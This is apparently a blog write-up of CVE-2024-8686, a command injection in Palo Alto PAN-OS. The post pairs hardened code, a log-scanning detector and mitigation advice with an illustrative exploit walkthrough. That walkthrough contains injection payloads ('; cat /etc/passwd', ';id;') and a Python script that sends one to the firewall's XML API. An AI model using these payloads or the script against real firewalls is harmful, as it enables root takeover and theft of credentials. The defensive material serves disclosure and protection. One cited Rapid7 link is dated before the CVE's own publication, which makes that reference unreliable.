CVE-2024-8686 - How Hackers Can Take Over Palo Alto Firewalls With One Command (With Exploit Example)

CVE-2024-8686 is a newly disclosed command injection vulnerability in PAN-OS, the operating system behind Palo Alto Networks' firewalls. It allows an authenticated administrator to bypass the restrictions PAN-OS places on admin activity and run arbitrary commands as root. In simple terms: if a bad actor obtains admin credentials (through phishing, an insider, or another breach) they can take over the firewall completely.

In this post, I'll walk you through:

- What CVE-2024-8686 is and who it affects
- How this class of command injection works
- An illustrative exploit walkthrough and script
- What an attacker can do afterwards, and how to mitigate

What is CVE-2024-8686?

According to the official advisory from Palo Alto Networks, this is a command injection bug in PAN-OS that affects the specific PAN-OS releases listed in the advisory; check your exact version against it rather than assuming. If an attacker controls an admin account, they can exploit this bug to run their own commands as the most powerful user on the system, root, which means full control of the appliance.

> Critical point: An attacker *must* already be authenticated as an admin. That lowers the severity compared with an unauthenticated bug, but many organizations still share admin credentials, and admin accounts and sessions can be phished or stolen.

Attack vector: the management plane (the web admin UI or the XML API), reachable over the network by anyone who can connect to the management interface and authenticate as an administrator. Traffic passing through the firewall is not the path; access to the management interface is.

How Does the Vulnerability Work?

Palo Alto has not published the affected code or named the exact component, so what follows describes the general pattern behind this class of bug: a management-plane handler takes user-provided input and passes it into a shell command without proper sanitization.

Here's a simplified illustration (this is a model of the bug class, not PAN-OS source):

import os

# Vulnerable model: user-controlled input interpolated into a shell command line.
def run_diag_tool(tool_name, options):
    # Dangerous: both fields come straight from the admin UI and are parsed
    # by /bin/sh, so ";" "|" "$(" and friends are treated as shell syntax.
    os.system(f"/usr/local/bin/{tool_name} {options}")

# An attacker fills in tool_name or options with a command injection payload.

If an administrator enters something like this via the web portal, typically in diagnostic tools or custom command fields, the input goes straight to the operating system shell, which runs as root on the management plane.

Example:

If the intended command is

/usr/local/bin/ping -c 4 8.8.8.8

But an attacker enters this as the options value:

-c 4 8.8.8.8 ; id

The shell treats `;` as a command separator, so it runs ping and then executes `id` as root, revealing the effective user. Any other command could be substituted.
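To make the difference concrete, here is an added example (my code, not PAN-OS source or anything from the advisory) that runs the vulnerable pattern next to the hardened one. Because a real ping needs network access, the example substitutes `echo` for `/usr/local/bin/ping`: it just prints the arguments it receives, which is enough to show what the shell actually executed. The validation rules (IP literal or plain hostname, no leading `-`, bounded count) are my assumptions about what a diagnostic tool should accept.

```python
import ipaddress
import re
import subprocess

# Stand-in for /usr/local/bin/ping so the demo runs offline (assumption:
# echo is available). It prints its arguments, which is what we want to see.
PING = ["echo", "ping"]

# Plain hostname: letters, digits, dots and hyphens only. The negative
# lookahead refuses a leading "-", so a value cannot become a ping option.
_HOSTNAME_RE = re.compile(r"^(?!-)[A-Za-z0-9.-]{1,253}$")


def run_vulnerable(options: str) -> str:
    """Model of the flaw: user text is pasted into a shell command string."""
    cmdline = f"{' '.join(PING)} {options}"
    return subprocess.run(cmdline, shell=True, capture_output=True, text=True).stdout


def validate_host(host: str) -> str:
    """Accept an IPv4/IPv6 literal or a plain hostname; reject everything else."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if _HOSTNAME_RE.fullmatch(host):
        return host
    raise ValueError(f"unsafe host value: {host!r}")


def is_safe_host(host: str) -> bool:
    try:
        validate_host(host)
        return True
    except ValueError:
        return False


def validate_count(count) -> int:
    n = int(count)
    if not 1 <= n <= 20:
        raise ValueError("count out of range")
    return n


def build_argv(host: str, count) -> list[str]:
    """Hardened version: validated fields placed into an argv list."""
    return [*PING, "-c", str(validate_count(count)), validate_host(host)]


def run_hardened(host: str, count) -> str:
    """No shell involved: the OS receives argv directly, so ";" is just a byte."""
    return subprocess.run(build_argv(host, count), capture_output=True, text=True).stdout


if __name__ == "__main__":
    # The post's payload: the shell runs the stand-in ping, then the injected command.
    print(run_vulnerable("-c 4 8.8.8.8 ; echo INJECTED"), end="")
    # Same intent through the hardened path.
    print(run_hardened("8.8.8.8", 4), end="")
    # The injection attempt never reaches a shell; it is rejected at validation.
    try:
        run_hardened("8.8.8.8 ; echo INJECTED", 4)
    except ValueError as err:
        print("rejected:", err)
```

Two points worth noting from the hardened version: switching to an argv list removes shell parsing, but it does not by itself stop argument injection (a host value of `-f` would still be handed to ping as a flag), which is why the validator also refuses values starting with `-`; and validating against an allow-list of what a field is supposed to contain is far more robust than trying to blacklist individual metacharacters.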

Exploit Details & PoC

The following walkthrough shows how an attacker with access to the firewall's web admin UI could abuse a flaw of this kind to run commands or read sensitive files. Because the exact affected field was not published, the ping diagnostic is used here as a stand-in for whichever input is vulnerable:

Step 1: Log in to the management web interface with the stolen or shared administrator credentials.

Step 2: Open a diagnostic tool that takes a user-supplied value, such as a ping or traceroute page that accepts a host.

Step 3: Enter a payload in the input, such as

; cat /etc/passwd

This would result in the system running

/usr/local/bin/ping -c 4 8.8.8.8 ; cat /etc/passwd

Which runs ping, then dumps the password file. Since the command runs as root, the same technique could read the running configuration or any other file on the appliance.

Automated Exploit Example in Python

Here's a Python script using the requests library to automate the same attack against the XML API (replace the address and credentials with your appliance's). The ping op command is used as the illustrative injection point; the field actually affected by CVE-2024-8686 is not public.

import requests
import urllib3

# Management interfaces usually present a self-signed certificate.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

firewall = "https://<firewall-ip>"   # replace with your appliance's address
auth = ("admin", "password")         # replace with actual admin credentials
                                     # (the XML API also accepts key= from type=keygen)

# Illustrative payload: a shell metacharacter inside the ping host field.
params = {"type": "op", "cmd": "<ping><host>;id;</host></ping>"}

# requests URL-encodes the XML and metacharacters in the query string for us.
response = requests.get(f"{firewall}/api/", params=params, auth=auth, verify=False)
print(response.status_code)
print(response.text)

Warning:
This code is for educational purposes only. Do not use on systems you do not own or manage.

Post-exploitation impact

- Persistence: add new admin users, alter configs, create backdoors.
- Data exposure: with root, the running configuration, stored credentials and logs on the appliance are all readable.
- Lateral movement within the enterprise: with root on the firewall, attackers might intercept, redirect, or tamper with all traffic.

Mitigation

- Patch immediately. Palo Alto has released fixed releases for the affected PAN-OS versions; the official advisory lists the affected and fixed versions.
- Restrict management-interface access to a dedicated, trusted management network, so the web UI and API are not reachable from the internet or from general user VLANs.
- Review who has admin access. Replace shared admin credentials with individual accounts, remove accounts that are no longer needed, and require MFA for administrators.
- Monitor admin activity: alert on logins from unexpected sources and on operational commands or API calls whose parameters contain shell metacharacters.
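The monitoring point above is easiest to show with code, so here is an added example (my own, not a Palo Alto tool and not based on PAN-OS's real log format). It scans constructed access-log lines for XML API calls of type `op` and flags any command value that contains shell metacharacters, which is exactly the signature the script in the exploit section would leave. The log format (timestamp, source IP, admin user, method, request, status) is my assumption; in a real deployment you would adapt the parser to whatever management-plane or proxy logs you actually collect.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

# Characters that have no business in a hostname or other op-command value.
SHELL_META = re.compile(r"[;|&`$\n<>\\]")

# Constructed sample lines for the demo (not real PAN-OS output).
# Fields: timestamp, source IP, admin user, method, request, HTTP status.
SAMPLE_LOG = """\
2024-09-12T10:15:01Z 203.0.113.7 admin GET /api/?type=op&cmd=%3Cping%3E%3Chost%3E8.8.8.8%3C%2Fhost%3E%3C%2Fping%3E 200
2024-09-12T10:15:09Z 203.0.113.7 admin GET /api/?type=op&cmd=%3Cping%3E%3Chost%3E8.8.8.8%3Bid%3B%3C%2Fhost%3E%3C%2Fping%3E 200
2024-09-12T10:16:22Z 198.51.100.4 netops GET /api/?type=config&action=show&xpath=/config/devices 200
2024-09-12T10:17:05Z 203.0.113.7 admin GET /api/?type=op&cmd=%3Cping%3E%3Chost%3E%24(id)%3C%2Fhost%3E%3C%2Fping%3E 200
"""


def op_command_values(cmd_xml: str):
    """Yield (element_path, text) for every non-empty text node in an op command."""
    root = ET.fromstring(cmd_xml)
    stack = [(root.tag, root)]
    while stack:
        path, element = stack.pop()
        if element.text and element.text.strip():
            yield path, element.text.strip()
        for child in element:
            stack.append((f"{path}/{child.tag}", child))


def scan_line(line: str):
    """Return a list of (timestamp, user, src, element_path, value) findings."""
    ts, src, user, _method, target, _status = line.split()
    query = parse_qs(urlsplit(target).query)   # parse_qs also URL-decodes
    if query.get("type") != ["op"] or "cmd" not in query:
        return []
    cmd_xml = query["cmd"][0]
    try:
        values = list(op_command_values(cmd_xml))
    except ET.ParseError:
        # A cmd that is not even well-formed XML deserves a look on its own.
        return [(ts, user, src, "<unparseable>", cmd_xml)]
    return [(ts, user, src, path, value)
            for path, value in values if SHELL_META.search(value)]


def scan_log(text: str):
    return [finding for line in text.splitlines() if line.strip()
            for finding in scan_line(line)]


if __name__ == "__main__":
    for ts, user, src, path, value in scan_log(SAMPLE_LOG):
        print(f"{ts} user={user} src={src} field={path} value={value!r}")
```

Running it over the constructed sample flags the two `admin` requests whose host field carries `;id;` and `$(id)`, and ignores the clean ping and the unrelated config query. Pair a hit like this with the source address and account to decide whether you are looking at an admin experimenting or a stolen credential being used.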

References

- Palo Alto Official Advisory: https://security.paloaltonetworks.com/CVE-2024-8686
- NIST NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2024-8686
- Additional insights: The Hacker News coverage
- Security community writeup: https://www.rapid7.com/blog/post/2024/06/07/cve-2024-8686-palo-alto-panos-authenticated-rce-explained/

Takeaway

CVE-2024-8686 is a strong reminder that even leading enterprise firewalls can have dangerous flaws, and that "authenticated only" is not the same as "low risk" when the account in question is an administrator. Never assume trusted admin actions are safe, and always keep your security appliances up to date.

If you’re a Palo Alto customer, patch now, and review who has admin access. If you’re a security pro, monitor for misuse—and share this knowledge to keep the internet safer.


*If you found this write-up helpful, please share or comment with your experience patching this CVE. Stay cyber safe!*

Timeline

Published on: 09/11/2024 17:15:14 UTC
Last modified on: 10/03/2024 01:35:10 UTC